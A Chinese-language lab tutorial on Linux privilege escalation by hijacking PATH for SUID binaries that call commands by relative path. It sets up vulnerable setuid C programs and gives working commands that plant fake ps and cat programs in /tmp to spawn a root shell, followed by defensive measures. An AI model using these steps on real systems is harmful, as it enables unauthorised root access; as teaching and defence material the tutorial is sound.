Linux环境变量提权技术详解<\/h1>

环境变量PATH基础<\/h2>
$PATH<\/code>是Linux系统中的环境变量，用于指定可执行程序的搜索路径。当用户在终端运行命令时，系统会在$PATH<\/code>列出的目录中查找对应的可执行文件。<\/p>
查看当前用户的PATH设置：<\/p>
echo $PATH
<\/span><\/span><\/code><\/pre>典型输出：<\/p>
\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games
<\/code><\/pre>
关键点<\/strong>：PATH中的.<\/code>表示当前目录，这可能导致安全风险，因为攻击者可以在当前目录放置恶意程序来劫持合法命令。<\/p>
提权原理<\/h2>
当具有SUID权限的程序调用系统命令时，如果：<\/p>

程序使用相对路径调用命令（如直接调用ps<\/code>而非\/bin\/ps<\/code>）<\/li>
攻击者可以控制PATH环境变量<\/li>
攻击者可以在PATH优先搜索的目录中放置恶意程序<\/li>
<\/ol>
则攻击者可以劫持命令执行，实现权限提升。<\/p>
实验环境搭建<\/h2>
方法1：调用ps命令的示例<\/h3>

创建测试目录和程序：<\/li>
<\/ol>
mkdir script
<\/span><\/span>cd script
<\/span><\/span>nano demo.c
<\/span><\/span><\/code><\/pre>demo.c<\/code>内容：<\/p>
#include<\/span><unistd.h><\/span>
<\/span><\/span><\/span><\/span>void<\/span> main<\/span>()
<\/span><\/span>{
<\/span><\/span>    setuid(0<\/span>);
<\/span><\/span>    setgid(0<\/span>);
<\/span><\/span>    system("ps"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
编译并设置SUID权限：<\/li>
<\/ol>
gcc demo.c -o shell
<\/span><\/span>chmod u+s shell
<\/span><\/span>ls -la shell  # 确认SUID权限设置成功<\/span>
<\/span><\/span><\/code><\/pre>方法2：调用id命令的示例<\/h3>

创建程序：<\/li>
<\/ol>
nano test.c
<\/span><\/span><\/code><\/pre>test.c<\/code>内容：<\/p>
#include<\/span><unistd.h><\/span>
<\/span><\/span><\/span><\/span>void<\/span> main<\/span>()
<\/span><\/span>{
<\/span><\/span>    setuid(0<\/span>);
<\/span><\/span>    setgid(0<\/span>);
<\/span><\/span>    system("id"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
编译并设置权限：<\/li>
<\/ol>
gcc test.c -o shell2
<\/span><\/span>chmod u+s shell2
<\/span><\/span><\/code><\/pre>方法3：调用cat命令读取\/etc\/passwd<\/h3>

创建程序：<\/li>
<\/ol>
nano raj.c
<\/span><\/span><\/code><\/pre>raj.c<\/code>内容：<\/p>
#include<\/span><unistd.h><\/span>
<\/span><\/span><\/span><\/span>void<\/span> main<\/span>()
<\/span><\/span>{
<\/span><\/span>    setuid(0<\/span>);
<\/span><\/span>    setgid(0<\/span>);
<\/span><\/span>    system("cat \/etc\/passwd"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
编译并设置权限：<\/li>
<\/ol>
gcc raj.c -o raj
<\/span><\/span>chmod u+s raj
<\/span><\/span><\/code><\/pre>方法4：调用cat命令读取不存在的文件<\/h3>

创建程序：<\/li>
<\/ol>
nano demo.c
<\/span><\/span><\/code><\/pre>demo.c<\/code>内容：<\/p>
#include<\/span><unistd.h><\/span>
<\/span><\/span><\/span><\/span>void<\/span> main<\/span>()
<\/span><\/span>{
<\/span><\/span>    setuid(0<\/span>);
<\/span><\/span>    setgid(0<\/span>);
<\/span><\/span>    system("cat \/home\/raj\/msg.txt"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
编译并设置权限：<\/li>
<\/ol>
gcc demo.c -o ignite
<\/span><\/span>chmod u+s ignite
<\/span><\/span><\/code><\/pre>攻击方法<\/h2>
查找SUID程序<\/h3>
首先查找具有SUID权限的程序：<\/p>
find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span><\/code><\/pre>方法1：使用echo创建恶意程序<\/h3>

创建恶意ps程序：<\/li>
<\/ol>
cd \/tmp
<\/span><\/span>echo "\/bin\/bash"<\/span> > ps
<\/span><\/span>chmod 777<\/span> ps
<\/span><\/span><\/code><\/pre>
修改PATH环境变量：<\/li>
<\/ol>
echo $PATH
<\/span><\/span>export PATH=<\/span>\/tmp:$PATH
<\/span><\/span><\/code><\/pre>
执行目标程序：<\/li>
<\/ol>
cd \/home\/raj\/script
<\/span><\/span>.\/shell
<\/span><\/span>whoami  # 确认是否为root<\/span>
<\/span><\/span><\/code><\/pre>方法2：使用copy命令<\/h3>

复制shell到恶意程序：<\/li>
<\/ol>
cd \/home\/raj\/script
<\/span><\/span>cp \/bin\/sh \/tmp\/ps
<\/span><\/span><\/code><\/pre>
修改PATH并执行：<\/li>
<\/ol>
export PATH=<\/span>\/tmp:$PATH
<\/span><\/span>.\/shell
<\/span><\/span>whoami
<\/span><\/span><\/code><\/pre>方法3：使用符号链接(symlink)<\/h3>

创建符号链接：<\/li>
<\/ol>
ln -s \/bin\/sh ps
<\/span><\/span><\/code><\/pre>
修改PATH并执行：<\/li>
<\/ol>
export PATH=<\/span>.:$PATH  # 注意当前目录(.)需要可写权限<\/span>
<\/span><\/span>.\/shell
<\/span><\/span>id
<\/span><\/span>whoami
<\/span><\/span><\/code><\/pre>方法4：使用文本编辑器创建恶意程序<\/h3>

使用nano创建恶意cat程序：<\/li>
<\/ol>
cd \/tmp
<\/span><\/span>nano cat
<\/span><\/span><\/code><\/pre>内容输入\/bin\/bash<\/code>并保存<\/p>

设置权限并修改PATH：<\/li>
<\/ol>
chmod 777<\/span> cat
<\/span><\/span>export PATH=<\/span>\/tmp:$PATH
<\/span><\/span><\/code><\/pre>
执行目标程序：<\/li>
<\/ol>
cd \/home\/raj\/script
<\/span><\/span>.\/ignite
<\/span><\/span>whoami
<\/span><\/span><\/code><\/pre>防御措施<\/h2>


避免使用相对路径<\/strong>：在程序中始终使用绝对路径调用系统命令<\/p>
system("\/bin\/ps"<\/span>);  \/\/ 好
<\/span><\/span><\/span><\/span>system("ps"<\/span>);       \/\/ 坏
<\/span><\/span><\/span><\/code><\/pre><\/li>

重置环境变量<\/strong>：在特权程序开始时重置环境变量<\/p>
clearenv();
<\/span><\/span><\/code><\/pre><\/li>

最小权限原则<\/strong>：不要随意给程序设置SUID权限<\/p>
<\/li>

PATH安全配置<\/strong>：避免在PATH中包含当前目录(.)，或将其放在最后<\/p>
<\/li>

文件系统权限<\/strong>：确保\/tmp等目录不能随意写入可执行文件<\/p>
<\/li>
<\/ol>
总结<\/h2>
通过控制PATH环境变量实现提权的关键在于：<\/p>

找到具有SUID权限且调用系统命令的程序<\/li>
程序使用相对路径调用命令<\/li>
能够在PATH优先搜索的目录中写入恶意程序<\/li>
通过修改PATH使系统优先执行恶意程序而非合法程序<\/li>
<\/ol>
管理员应通过上述防御措施来防止此类攻击，而安全测试人员可以利用这些技术来评估系统安全性。<\/p>